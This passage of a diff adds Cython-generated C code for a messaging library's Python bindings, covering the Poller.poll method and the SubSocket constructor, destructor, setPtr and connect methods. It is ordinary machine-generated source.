"cereal/messaging/messaging_pyx.pyx":150 + * + * def poll(self, timeout): + * sockets = [] # <<<<<<<<<<<<<< + * cdef int t = timeout + * + */ + __pyx_t_1 = PyList_New(0); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 150, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_v_sockets = ((PyObject*)__pyx_t_1); + __pyx_t_1 = 0; + + /* "cereal/messaging/messaging_pyx.pyx":151 + * def poll(self, timeout): + * sockets = [] + * cdef int t = timeout # <<<<<<<<<<<<<< + * + * with nogil: + */ + __pyx_t_2 = __Pyx_PyInt_As_int(__pyx_v_timeout); if (unlikely((__pyx_t_2 == (int)-1) && PyErr_Occurred())) __PYX_ERR(0, 151, __pyx_L1_error) + __pyx_v_t = __pyx_t_2; + + /* "cereal/messaging/messaging_pyx.pyx":153 + * cdef int t = timeout + * + * with nogil: # <<<<<<<<<<<<<< + * result = self.poller.poll(t) + * + */ + { + #ifdef WITH_THREAD + PyThreadState *_save; + _save = NULL; + Py_UNBLOCK_THREADS + __Pyx_FastGIL_Remember(); + #endif + /*try:*/ { + + /* "cereal/messaging/messaging_pyx.pyx":154 + * + * with nogil: + * result = self.poller.poll(t) # <<<<<<<<<<<<<< + * + * for s in result: + */ + __pyx_v_result = __pyx_v_self->poller->poll(__pyx_v_t); + } + + /* "cereal/messaging/messaging_pyx.pyx":153 + * cdef int t = timeout + * + * with nogil: # <<<<<<<<<<<<<< + * result = self.poller.poll(t) + * + */ + /*finally:*/ { + /*normal exit:*/{ + #ifdef WITH_THREAD + __Pyx_FastGIL_Forget(); + Py_BLOCK_THREADS + #endif + goto __pyx_L5; + } + __pyx_L5:; + } + } + + /* "cereal/messaging/messaging_pyx.pyx":156 + * result = self.poller.poll(t) + * + * for s in result: # <<<<<<<<<<<<<< + * socket = SubSocket() + * socket.setPtr(s) + */ + __pyx_t_3 = __pyx_v_result.begin(); + for (;;) { + if (!(__pyx_t_3 != __pyx_v_result.end())) break; + __pyx_t_4 = *__pyx_t_3; + ++__pyx_t_3; + __pyx_v_s = __pyx_t_4; + + /* "cereal/messaging/messaging_pyx.pyx":157 + * + * for s in result: + * socket = SubSocket() # <<<<<<<<<<<<<< + * socket.setPtr(s) + * sockets.append(socket) + */ + __pyx_t_1 = __Pyx_PyObject_CallNoArg(((PyObject *)__pyx_ptype_6cereal_9messaging_13messaging_pyx_SubSocket)); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 157, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_XDECREF_SET(__pyx_v_socket, ((struct __pyx_obj_6cereal_9messaging_13messaging_pyx_SubSocket *)__pyx_t_1)); + __pyx_t_1 = 0; + + /* "cereal/messaging/messaging_pyx.pyx":158 + * for s in result: + * socket = SubSocket() + * socket.setPtr(s) # <<<<<<<<<<<<<< + * sockets.append(socket) + * + */ + __pyx_t_1 = ((struct __pyx_vtabstruct_6cereal_9messaging_13messaging_pyx_SubSocket *)__pyx_v_socket->__pyx_vtab)->setPtr(__pyx_v_socket, __pyx_v_s); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 158, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + + /* "cereal/messaging/messaging_pyx.pyx":159 + * socket = SubSocket() + * socket.setPtr(s) + * sockets.append(socket) # <<<<<<<<<<<<<< + * + * return sockets + */ + __pyx_t_5 = __Pyx_PyList_Append(__pyx_v_sockets, ((PyObject *)__pyx_v_socket)); if (unlikely(__pyx_t_5 == ((int)-1))) __PYX_ERR(0, 159, __pyx_L1_error) + + /* "cereal/messaging/messaging_pyx.pyx":156 + * result = self.poller.poll(t) + * + * for s in result: # <<<<<<<<<<<<<< + * socket = SubSocket() + * socket.setPtr(s) + */ + } + + /* "cereal/messaging/messaging_pyx.pyx":161 + * sockets.append(socket) + * + * return sockets # <<<<<<<<<<<<<< + * + * + */ + __Pyx_XDECREF(__pyx_r); + __Pyx_INCREF(__pyx_v_sockets); + __pyx_r = __pyx_v_sockets; + goto __pyx_L0; + + /* "cereal/messaging/messaging_pyx.pyx":149 + * self.poller.registerSocket(socket.socket) + * + * def poll(self, timeout): # <<<<<<<<<<<<<< + * sockets = [] + * cdef int t = timeout + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_AddTraceback("cereal.messaging.messaging_pyx.Poller.poll", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XDECREF(__pyx_v_sockets); + __Pyx_XDECREF((PyObject *)__pyx_v_socket); + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "(tree fragment)":1 + * def __reduce_cython__(self): # <<<<<<<<<<<<<< + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + * def __setstate_cython__(self, __pyx_state): + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_6cereal_9messaging_13messaging_pyx_6Poller_9__reduce_cython__(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyMethodDef __pyx_mdef_6cereal_9messaging_13messaging_pyx_6Poller_9__reduce_cython__ = {"__reduce_cython__", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_6cereal_9messaging_13messaging_pyx_6Poller_9__reduce_cython__, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}; +static PyObject *__pyx_pw_6cereal_9messaging_13messaging_pyx_6Poller_9__reduce_cython__(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__reduce_cython__ (wrapper)", 0); + if (unlikely(__pyx_nargs > 0)) { + __Pyx_RaiseArgtupleInvalid("__reduce_cython__", 1, 0, 0, __pyx_nargs); return NULL;} + if (unlikely(__pyx_kwds) && __Pyx_NumKwargs_FASTCALL(__pyx_kwds) && unlikely(!__Pyx_CheckKeywordStrings(__pyx_kwds, "__reduce_cython__", 0))) return NULL; + __pyx_r = __pyx_pf_6cereal_9messaging_13messaging_pyx_6Poller_8__reduce_cython__(((struct __pyx_obj_6cereal_9messaging_13messaging_pyx_Poller *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_6cereal_9messaging_13messaging_pyx_6Poller_8__reduce_cython__(CYTHON_UNUSED struct __pyx_obj_6cereal_9messaging_13messaging_pyx_Poller *__pyx_v_self) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__reduce_cython__", 0); + + /* "(tree fragment)":2 + * def __reduce_cython__(self): + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" # <<<<<<<<<<<<<< + * def __setstate_cython__(self, __pyx_state): + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + */ + __Pyx_Raise(__pyx_builtin_TypeError, __pyx_kp_s_no_default___reduce___due_to_non, 0, 0); + __PYX_ERR(1, 2, __pyx_L1_error) + + /* "(tree fragment)":1 + * def __reduce_cython__(self): # <<<<<<<<<<<<<< + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + * def __setstate_cython__(self, __pyx_state): + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_AddTraceback("cereal.messaging.messaging_pyx.Poller.__reduce_cython__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "(tree fragment)":3 + * def __reduce_cython__(self): + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + * def __setstate_cython__(self, __pyx_state): # <<<<<<<<<<<<<< + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_6cereal_9messaging_13messaging_pyx_6Poller_11__setstate_cython__(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyMethodDef __pyx_mdef_6cereal_9messaging_13messaging_pyx_6Poller_11__setstate_cython__ = {"__setstate_cython__", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_6cereal_9messaging_13messaging_pyx_6Poller_11__setstate_cython__, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}; +static PyObject *__pyx_pw_6cereal_9messaging_13messaging_pyx_6Poller_11__setstate_cython__(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + CYTHON_UNUSED PyObject *__pyx_v___pyx_state = 0; + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__setstate_cython__ (wrapper)", 0); + { + PyObject **__pyx_pyargnames[] = {&__pyx_n_s_pyx_state,0}; + PyObject* values[1] = {0}; + if (__pyx_kwds) { + Py_ssize_t kw_args; + switch (__pyx_nargs) { + case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); + switch (__pyx_nargs) { + case 0: + if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pyx_state)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(1, 3, __pyx_L3_error) + else goto __pyx_L5_argtuple_error; + } + if (unlikely(kw_args > 0)) { + const Py_ssize_t kwd_pos_args = __pyx_nargs; + if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "__setstate_cython__") < 0)) __PYX_ERR(1, 3, __pyx_L3_error) + } + } else if (unlikely(__pyx_nargs != 1)) { + goto __pyx_L5_argtuple_error; + } else { + values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + } + __pyx_v___pyx_state = values[0]; + } + goto __pyx_L4_argument_unpacking_done; + __pyx_L5_argtuple_error:; + __Pyx_RaiseArgtupleInvalid("__setstate_cython__", 1, 1, 1, __pyx_nargs); __PYX_ERR(1, 3, __pyx_L3_error) + __pyx_L3_error:; + __Pyx_AddTraceback("cereal.messaging.messaging_pyx.Poller.__setstate_cython__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_RefNannyFinishContext(); + return NULL; + __pyx_L4_argument_unpacking_done:; + __pyx_r = __pyx_pf_6cereal_9messaging_13messaging_pyx_6Poller_10__setstate_cython__(((struct __pyx_obj_6cereal_9messaging_13messaging_pyx_Poller *)__pyx_v_self), __pyx_v___pyx_state); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_6cereal_9messaging_13messaging_pyx_6Poller_10__setstate_cython__(CYTHON_UNUSED struct __pyx_obj_6cereal_9messaging_13messaging_pyx_Poller *__pyx_v_self, CYTHON_UNUSED PyObject *__pyx_v___pyx_state) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__setstate_cython__", 0); + + /* "(tree fragment)":4 + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + * def __setstate_cython__(self, __pyx_state): + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" # <<<<<<<<<<<<<< + */ + __Pyx_Raise(__pyx_builtin_TypeError, __pyx_kp_s_no_default___reduce___due_to_non, 0, 0); + __PYX_ERR(1, 4, __pyx_L1_error) + + /* "(tree fragment)":3 + * def __reduce_cython__(self): + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + * def __setstate_cython__(self, __pyx_state): # <<<<<<<<<<<<<< + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_AddTraceback("cereal.messaging.messaging_pyx.Poller.__setstate_cython__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "cereal/messaging/messaging_pyx.pyx":168 + * cdef bool is_owner + * + * def __cinit__(self): # <<<<<<<<<<<<<< + * self.socket = cppSubSocket.create() + * self.is_owner = True + */ + +/* Python wrapper */ +static int __pyx_pw_6cereal_9messaging_13messaging_pyx_9SubSocket_1__cinit__(PyObject *__pyx_v_self, PyObject *__pyx_args, PyObject *__pyx_kwds); /*proto*/ +static int __pyx_pw_6cereal_9messaging_13messaging_pyx_9SubSocket_1__cinit__(PyObject *__pyx_v_self, PyObject *__pyx_args, PyObject *__pyx_kwds) { + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + int __pyx_r; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__cinit__ (wrapper)", 0); + if (unlikely(__pyx_nargs > 0)) { + __Pyx_RaiseArgtupleInvalid("__cinit__", 1, 0, 0, __pyx_nargs); return -1;} + if (unlikely(__pyx_kwds) && __Pyx_NumKwargs_VARARGS(__pyx_kwds) && unlikely(!__Pyx_CheckKeywordStrings(__pyx_kwds, "__cinit__", 0))) return -1; + __pyx_r = __pyx_pf_6cereal_9messaging_13messaging_pyx_9SubSocket___cinit__(((struct __pyx_obj_6cereal_9messaging_13messaging_pyx_SubSocket *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static int __pyx_pf_6cereal_9messaging_13messaging_pyx_9SubSocket___cinit__(struct __pyx_obj_6cereal_9messaging_13messaging_pyx_SubSocket *__pyx_v_self) { + int __pyx_r; + __Pyx_RefNannyDeclarations + int __pyx_t_1; + PyObject *__pyx_t_2 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__cinit__", 0); + + /* "cereal/messaging/messaging_pyx.pyx":169 + * + * def __cinit__(self): + * self.socket = cppSubSocket.create() # <<<<<<<<<<<<<< + * self.is_owner = True + * + */ + __pyx_v_self->socket = SubSocket::create(); + + /* "cereal/messaging/messaging_pyx.pyx":170 + * def __cinit__(self): + * self.socket = cppSubSocket.create() + * self.is_owner = True # <<<<<<<<<<<<<< + * + * if self.socket == NULL: + */ + __pyx_v_self->is_owner = 1; + + /* "cereal/messaging/messaging_pyx.pyx":172 + * self.is_owner = True + * + * if self.socket == NULL: # <<<<<<<<<<<<<< + * raise MessagingError + * + */ + __pyx_t_1 = (__pyx_v_self->socket == NULL); + if (unlikely(__pyx_t_1)) { + + /* "cereal/messaging/messaging_pyx.pyx":173 + * + * if self.socket == NULL: + * raise MessagingError # <<<<<<<<<<<<<< + * + * def __dealloc__(self): + */ + __Pyx_GetModuleGlobalName(__pyx_t_2, __pyx_n_s_MessagingError); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 173, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __Pyx_Raise(__pyx_t_2, 0, 0, 0); + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + __PYX_ERR(0, 173, __pyx_L1_error) + + /* "cereal/messaging/messaging_pyx.pyx":172 + * self.is_owner = True + * + * if self.socket == NULL: # <<<<<<<<<<<<<< + * raise MessagingError + * + */ + } + + /* "cereal/messaging/messaging_pyx.pyx":168 + * cdef bool is_owner + * + * def __cinit__(self): # <<<<<<<<<<<<<< + * self.socket = cppSubSocket.create() + * self.is_owner = True + */ + + /* function exit code */ + __pyx_r = 0; + goto __pyx_L0; + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_2); + __Pyx_AddTraceback("cereal.messaging.messaging_pyx.SubSocket.__cinit__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = -1; + __pyx_L0:; + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "cereal/messaging/messaging_pyx.pyx":175 + * raise MessagingError + * + * def __dealloc__(self): # <<<<<<<<<<<<<< + * if self.is_owner: + * del self.socket + */ + +/* Python wrapper */ +static void __pyx_pw_6cereal_9messaging_13messaging_pyx_9SubSocket_3__dealloc__(PyObject *__pyx_v_self); /*proto*/ +static void __pyx_pw_6cereal_9messaging_13messaging_pyx_9SubSocket_3__dealloc__(PyObject *__pyx_v_self) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__dealloc__ (wrapper)", 0); + __pyx_pf_6cereal_9messaging_13messaging_pyx_9SubSocket_2__dealloc__(((struct __pyx_obj_6cereal_9messaging_13messaging_pyx_SubSocket *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); +} + +static void __pyx_pf_6cereal_9messaging_13messaging_pyx_9SubSocket_2__dealloc__(struct __pyx_obj_6cereal_9messaging_13messaging_pyx_SubSocket *__pyx_v_self) { + __Pyx_RefNannyDeclarations + int __pyx_t_1; + __Pyx_RefNannySetupContext("__dealloc__", 0); + + /* "cereal/messaging/messaging_pyx.pyx":176 + * + * def __dealloc__(self): + * if self.is_owner: # <<<<<<<<<<<<<< + * del self.socket + * + */ + __pyx_t_1 = (__pyx_v_self->is_owner != 0); + if (__pyx_t_1) { + + /* "cereal/messaging/messaging_pyx.pyx":177 + * def __dealloc__(self): + * if self.is_owner: + * del self.socket # <<<<<<<<<<<<<< + * + * cdef setPtr(self, cppSubSocket * ptr): + */ + delete __pyx_v_self->socket; + + /* "cereal/messaging/messaging_pyx.pyx":176 + * + * def __dealloc__(self): + * if self.is_owner: # <<<<<<<<<<<<<< + * del self.socket + * + */ + } + + /* "cereal/messaging/messaging_pyx.pyx":175 + * raise MessagingError + * + * def __dealloc__(self): # <<<<<<<<<<<<<< + * if self.is_owner: + * del self.socket + */ + + /* function exit code */ + __Pyx_RefNannyFinishContext(); +} + +/* "cereal/messaging/messaging_pyx.pyx":179 + * del self.socket + * + * cdef setPtr(self, cppSubSocket * ptr): # <<<<<<<<<<<<<< + * if self.is_owner: + * del self.socket + */ + +static PyObject *__pyx_f_6cereal_9messaging_13messaging_pyx_9SubSocket_setPtr(struct __pyx_obj_6cereal_9messaging_13messaging_pyx_SubSocket *__pyx_v_self, SubSocket *__pyx_v_ptr) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + int __pyx_t_1; + __Pyx_RefNannySetupContext("setPtr", 0); + + /* "cereal/messaging/messaging_pyx.pyx":180 + * + * cdef setPtr(self, cppSubSocket * ptr): + * if self.is_owner: # <<<<<<<<<<<<<< + * del self.socket + * + */ + __pyx_t_1 = (__pyx_v_self->is_owner != 0); + if (__pyx_t_1) { + + /* "cereal/messaging/messaging_pyx.pyx":181 + * cdef setPtr(self, cppSubSocket * ptr): + * if self.is_owner: + * del self.socket # <<<<<<<<<<<<<< + * + * self.is_owner = False + */ + delete __pyx_v_self->socket; + + /* "cereal/messaging/messaging_pyx.pyx":180 + * + * cdef setPtr(self, cppSubSocket * ptr): + * if self.is_owner: # <<<<<<<<<<<<<< + * del self.socket + * + */ + } + + /* "cereal/messaging/messaging_pyx.pyx":183 + * del self.socket + * + * self.is_owner = False # <<<<<<<<<<<<<< + * self.socket = ptr + * + */ + __pyx_v_self->is_owner = 0; + + /* "cereal/messaging/messaging_pyx.pyx":184 + * + * self.is_owner = False + * self.socket = ptr # <<<<<<<<<<<<<< + * + * def connect(self, Context context, string endpoint, string address=b"127.0.0.1", bool conflate=False): + */ + __pyx_v_self->socket = __pyx_v_ptr; + + /* "cereal/messaging/messaging_pyx.pyx":179 + * del self.socket + * + * cdef setPtr(self, cppSubSocket * ptr): # <<<<<<<<<<<<<< + * if self.is_owner: + * del self.socket + */ + + /* function exit code */ + __pyx_r = Py_None; __Pyx_INCREF(Py_None); + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "cereal/messaging/messaging_pyx.pyx":186 + * self.socket = ptr + * + * def connect(self, Context context, string endpoint, string address=b"127.0.0.1", bool conflate=False): # <<<<<<<<<<<<<< + * r = self.socket.connect(context.context, endpoint, address, conflate) + * + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_6cereal_9messaging_13messaging_pyx_9SubSocket_5connect(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyMethodDef __pyx_mdef_6cereal_9messaging_13messaging_pyx_9SubSocket_5connect = {"connect", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_6cereal_9messaging_13messaging_pyx_9SubSocket_5connect, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}; +static PyObject *__pyx_pw_6cereal_9messaging_13messaging_pyx_9SubSocket_5connect(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + struct __pyx_obj_6cereal_9messaging_13messaging_pyx_Context *__pyx_v_context = 0; + std::string __pyx_v_endpoint; + std::string __pyx_v_address; + bool __pyx_v_conflate; + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("connect (wrapper)", 0); + { + PyObject **__pyx_pyargnames[] = {&__pyx_n_s_context,&__pyx_n_s_endpoint,&__pyx_n_s_address,&__pyx_n_s_conflate,0}; + PyObject* values[4] = {0,0,0,0}; + if (__pyx_kwds) { + Py_ssize_t kw_args; + switch (__pyx_nargs) { + case 4: values[3] = __Pyx_Arg_FASTCALL(__pyx_args, 3); + CYTHON_FALLTHROUGH; + case 3: values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); + CYTHON_FALLTHROUGH; + case 2: values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); + CYTHON_FALLTHROUGH; + case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); + switch (__pyx_nargs) { + case 0: + if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_context)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 186, __pyx_L3_error) + else goto __pyx_L5_argtuple_error; + CYTHON_FALLTHROUGH; + case 1: + if (likely((values[1] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_endpoint)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 186, __pyx_L3_error) + else { + __Pyx_RaiseArgtupleInvalid("connect", 0, 2, 4, 1); __PYX_ERR(0, 186, __pyx_L3_error) + } + CYTHON_FALLTHROUGH; + case 2: + if (kw_args > 0) { + PyObject* value = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_address); + if (value) { values[2] = value; kw_args--; } + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 186, __pyx_L3_error) + } + CYTHON_FALLTHROUGH; + case 3: + if (kw_args > 0) { + PyObject* value = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_conflate); + if (value) { values[3] = value; kw_args--; } + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 186, __pyx_L3_error) + } + } + if (unlikely(kw_args > 0)) { + const Py_ssize_t kwd_pos_args = __pyx_nargs; + if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "connect") < 0)) __PYX_ERR(0, 186, __pyx_L3_error) + } + } else { + switch (__pyx_nargs) { + case 4: values[3] = __Pyx_Arg_FASTCALL(__pyx_args, 3); + CYTHON_FALLTHROUGH; + case 3: values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); + CYTHON_FALLTHROUGH; + case 2: values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); + values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + break; + default: goto __pyx_L5_argtuple_error; + } + } + __pyx_v_context = ((struct __pyx_obj_6cereal_9messaging_13messaging_pyx_Context *)values[0]); + __pyx_v_endpoint = __pyx_convert_string_from_py_std__in_string(values[1]); if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 186, __pyx_L3_error) + if (values[2]) { + __pyx_v_address = __pyx_convert_string_from_py_std__in_string(values[2]); if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 186, __pyx_L3_error) + } else { + __pyx_v_address = __pyx_k__3; + } + if (values[3]) { + __pyx_v_conflate = __Pyx_PyObject_IsTrue(values[3]); if (unlikely((__pyx_v_conflate == ((bool)-1)) && PyErr_Occurred())) __PYX_ERR(0, 186, __pyx_L3_error) + } else { + __pyx_v_conflate = ((bool)0); + } + } + goto __pyx_L4_argument_unpacking_done; + __pyx_L5_argtuple_error:; + __Pyx_RaiseArgtupleInvalid("connect", 0, 2, 4, __pyx_nargs); __PYX_ERR(0, 186, __pyx_L3_error) + __pyx_L3_error:; + __Pyx_AddTraceback("cereal.messaging.messaging_pyx.SubSocket.connect", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_RefNannyFinishContext(); + return NULL; + __pyx_L4_argument_unpacking_done:; + if (unlikely(!__Pyx_ArgTypeTest(((PyObject *)__pyx_v_context), __pyx_ptype_6cereal_9messaging_13messaging_pyx_Context, 1, "context", 0))) __PYX_ERR(0, 186, __pyx_L1_error) + __pyx_r = __pyx_pf_6cereal_9messaging_13messaging_pyx_9SubSocket_4connect(((struct __pyx_obj_6cereal_9messaging_13messaging_pyx_SubSocket *)__pyx_v_self), __pyx_v_context, __PYX_STD_MOVE_IF_SUPPORTED(__pyx_v_endpoint), __PYX_STD_MOVE_IF_SUPPORTED(__pyx_v_address), __pyx_v_conflate); + + /* function exit code */ + goto __pyx_L0; + __pyx_L1_error:; + __pyx_r = NULL; + __pyx_L0:; + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_6cereal_9messaging_13messaging_pyx_9SubSocket_4connect(struct __pyx_obj_6cereal_9messaging_13messaging_pyx_SubSocket *__pyx_v_self, struct __pyx_obj_6cereal_9messaging_13messaging_pyx_Context *__pyx_v_context, std::string __pyx_v_endpoint, std::string __pyx_v_address, bool __pyx_v_conflate) { + int __pyx_v_r; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + int __pyx_t_1; + PyObject *__pyx_t_2 = NULL; + PyObject *__pyx_t_3 = NULL; + PyObject *__pyx_t_4 = NULL; + PyObject *__pyx_t_5 = NULL; + int __pyx_t_6; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("connect", 0); + + /* "cereal/messaging/messaging_pyx.pyx":187 + * + * def connect(self, Context context, string endpoint, string address=b"127.0.0.1", bool conflate=False): + * r = self.socket.connect(context.context, endpoint, address, conflate) # <<<<<<<<<<<<<< + * + * if r != 0: + */ + __pyx_v_r = __pyx_v_self->socket->connect(__pyx_v_context->context, __pyx_v_endpoint, __pyx_v_address, __pyx_v_conflate); + + /* "cereal/messaging/messaging_pyx.pyx":189 + * r = self.socket.connect(context.context, endpoint, address, conflate) + * + * if r != 0: # <<<<<<<<<<<<<< + * if errno.errno == errno.EADDRINUSE: + * raise 